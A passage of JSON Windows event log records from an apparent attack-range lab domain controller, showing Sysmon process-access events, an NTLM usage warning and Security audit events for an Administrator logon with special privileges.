SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2363,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2364,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2365,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2366,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2367,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.172\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01D2-5F25-0000-0010F7220400}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.172","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01D2-5F25-0000-0010F7220400}","TargetProcessId":"3928","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2368,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.328\r\nSourceProcessGUID: {A837DB8D-01D2-5F25-0000-0010F7220400}\r\nSourceProcessId: 3928\r\nSourceThreadId: 3856\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+577205|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+576d36|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+56c09|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+572d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+8fe2c4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.328","SourceProcessGUID":"{A837DB8D-01D2-5F25-0000-0010F7220400}","SourceProcessId":"3928","SourceThreadId":"3856","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+577205|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+576d36|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+56c09|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+572d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+8fe2c4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":36028797018963968,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":6038,"SourceName":"LsaSrv","ProviderGuid":"{199FE037-2B82-40A9-82AC-E1D46C792B99}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76822,"ProcessID":0,"ThreadID":0,"Channel":"System","Message":"Microsoft Windows Server has detected that NTLM authentication is presently being used between clients and this server. This event occurs once per boot of the server on the first time a client uses NTLM with this server.\r\n \r\nNTLM is a weaker authentication mechanism. Please check:\r\n \r\n      Which applications are using NTLM authentication?\r\n      Are there configuration issues preventing the use of stronger authentication such as Kerberos authentication?\r\n      If NTLM must be supported, is Extended Protection configured?\r\n \r\nDetails on how to complete these checks can be found at http://go.microsoft.com/fwlink/?LinkId=225699.","Opcode":"Info","EventReceivedTime":"2020-08-01 05:47:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4776,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14336,"OpcodeValue":0,"RecordNumber":220301,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"The computer attempted to validate the credentials for an account.\r\n\r\nAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\r\nLogon Account:\tAdministrator\r\nSource Workstation:\tWIN-DC-881393\r\nError Code:\t0x0","Category":"Credential Validation","Opcode":"Info","PackageName":"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0","TargetUserName":"Administrator","Workstation":"WIN-DC-881393","Status":"0x0","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220302,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220303,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x43AA3\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x43aa3","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220304,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x43AA3\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special 